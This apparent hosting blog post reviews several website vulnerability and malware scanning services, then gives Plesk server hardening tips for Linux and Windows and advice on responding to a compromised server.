Tools To Scan For Security Vulnerabilities and Malware

Web security is something we should all be doing nowadays, because there are literally hundreds of different potential ways that any site can become compromised. You should regularly scan security vulnerabilities to stay safe from these sorts of potential problems – cross site scripting,  vulnerable components, DOM-based vulnerabilities, SQL injections, cross site request forgery and crlf/xxe/http injections

Let’s face it, we don’t always scan security vulnerabilities as much as we should. It’s an easy task to overlook because so much needs to go into designing, testing, and marketing a website. We’re often more focused on success than safety, but that really is a false economy. It’s like building a fabulous house but forgetting to put a lock on the front door. Security underpins everything else you do with your property, so you can’t afford to let it slip. If you don’t scan security vulnerabilities, then the chances are good that someone, somewhere will find a way in and cause havoc. If you feel put off from thinking about security because it seems complicated, don’t worry. There are plenty of tools out there that will scan website security vulnerabilities for you. Some of them even offer free trials so you can road test them to see if they’re going to work for you:

SUCURI

SUCURI is free and its used widely to scan website for malware. It’s great at tracking down malware and scanning for security issues, and it will report on malware blacklisting status, show you points where SPAM has been injected, and point out instances where someone has made unwelcome changes to your site. If you’re using popular platforms such as WordPress, Joomla, Magento, Drupal, phpBB, then it’s going to work just fine for you.

Quttera

Quttera can scan website for malware and possible exploits. It combs your website for potentially malicious and suspicious files, using PhishTank, Safe Browsing (Google, Yandex), and Malware domain list.

Qualys

SSL Server Test by Qualys looks for SSL/TLS that has been configured wrongly and also for inherent weaknesses on your site. It can check your https:// URL including the date expires, its overall rating, cipher, SSL/TLS version, do a handshake simulation, look for protocol details, BEAST and other things too.

It’s important to run the Qualys test every time you make a change to SSL/TLS. It can scan security vulnerabilities or scan website for malware, so you’ll be assured that any changes you’ve made are safe.

Intruder

Intruder is based in the cloud and it looks for weaknesses in the whole web app set-up. It’s engineered to deliver a level of security protection that makes it suitable for governments, banks and similar enterprises that call for high-end safety, and its scanning engine is simple to use as well.

Its comprehensive security features allow it to identify:

  • absent patches
  • incorrect configurations
  • web application issues including SQL injection and cross-site scripting
  • CMS problems

Intruder can scan website security vulnerabilities and put results in order of priority according to their context to save you time. It can also proactively scan your systems for the most recently identified weaknesses. It can integrate with major cloud providers (AWS, GCP, Azure) as well as Slack and Jira.

Detectify

Ethical hackers lend their expertise to ensure Detectify keeps your website and web apps secure with automatic security and monitoring of assets. It can identify upwards of 1500 potential threats.

It can scan for vulnerable points with OWASP Top 10, CORS, Amazon S3 Bucket, and misconfigured DNS. It has Asset Monitoring and it keeps a non-stop eye on your subdomains, searching for takeovers and alerting you if anything anomalous is picked up.

Detectify’s pricing plans come in three flavors, called Starter, Professional, and Enterprise and they all come with a two-week free trial, no credit card needed.

UpGuard

UpGuard Web Scan can assess risk using information that’s publicly available. It can organize test results into these groupings:

  • website threats
  • email threats
  • network security
  • malware and phishing
  • brand defense

It’s great at quickly giving you insights about where your website is at the moment, security-wise.

Pentest-Tools

This scanner is just one of many tools on offer from Pentest-Tools. It can gather information, test web apps, CMS, infrastructure, and SSL. Its main purpose is to find the most frequently-occurring web app vulnerabilities and problems with server configuration.

There’s a basic version that does passive web security scanning, and it’s adept at finding things like unsafe cookie settings, unsafe HTTP headers, and out-of-date server software. It will grant you two full scans for free, and that will be enough to give you a very good overview of any problems with things like local file inclusion, SQL injection, OS command injection, and XSS, for example.

Observatory

Mozilla has launched Observatory, which can scan website for malware and has other security features. It validates the security of OWASP headers, checks TLS best practices and carries out third-party tests from SSL Labs, High-Tech Bridge, Security Headers, HSTS Preload, and others.

Conclusion

All of these powerful tools can give you a great deal of insight into the kind of vulnerabilities that might affect your website, and enough of them have free offers that you’ll be able to decide which of them will serve you best.

Best practices to strengthen Plesk server security

Best practices to Strengthen Plesk server securty - Ples

Server security is the core of server management for any web hoster and server admin. Any online business should take server security seriously. Here we’ll explore the most important aspects at hardening Plesk servers and monitoring them for security vulnerabilities.

Plesk server security hardening

Plesk Server Security Hardening – Generic Steps

Latest Plesk has enhanced level of security right after the installation. Recently, Plesk launched Advisor, which unifies the best possible security practices and performance tune-up of the server and hosted websites. At the same time, it’s a good idea to ensure the following routine steps:

  • Insure regular Plesk updates
  • Change password strength to Strong
  • Use two step verification by installing Google Authenticator
  • Use SSL/TLS to secure mail server
  • Set sFTP connection
  • Limit administrative access to the system
  • Limit remote access via XML API
  • Actively use Web Application Firewall
  • Actively use WordPress Toolkit Security Check
  • Set automatic updates for WordPress instances
  • Insure outdated web applications are not used or update them on regular basis. The failure to comply this rule may result unexpected security vulnerabilities
  • Use VirusTotal Website Check to check existing websites

Block all ports which are not in use with the help of firewall.

server security tips for Plesk under Linux

Server Security Tips for Plesk under Linux

  • Use keyfile to allow SSH access
  • Use custom port to establish SSH connections
  • No SSH authentication for root user
  • Turn off Perl/Python for the website if these languages are not used as well as do no use mod_perl/mod_python
  • Use Opsani vulnerability scanner
  • Set Fail2Ban to prevent hacking attempts
  • Avoid PHP handler served as Apache module – not a secure practice
  • Ensure automatic updates of system packages are on
Server Security Tips for Plesk under Windows

Server Security Tips for Plesk under Windows

  • Custom port usage for RDP connections is a must
  • Get rid of unused programming languages
  • Make sure you install the latest Windows updates
  • Restrict users from overriding  handlers via web.config files
  • Keep DDoS protection enabled
What to do if server security is compromised - Plesk

What to do if server security is compromised

What we suggest here is migration to the new server. With a successful attack, intruders raise their privileges to root level – meaning they can do anything with the server. And just because you find malware/rootkits during investigation and clean it, doesn’t guarantee no others inside your system. It’s possible to load malware directly into RAM. There can be backdoors enabled or even common cronjobs for wget to download rootkits from already infected servers.

Try to restore the server using a previous snapshot doesn’t mean no server problems. Because in many cases, it’s not clear when exactly the server was hacked and rootkits  uploaded to the server.

How to identify the source of the problem

How to identify the source of the problem

While using security solutions dedicated to scanning for rootkits/malware you need to understand the following – these solutions use only already known patterns to identify the presence of malware and can be completely useless for new malicious software. To be 100% sure on how the server was hacked please contact security audit company which specializes on such cases. Please do not change anything before investigation to avoid the loss of traces.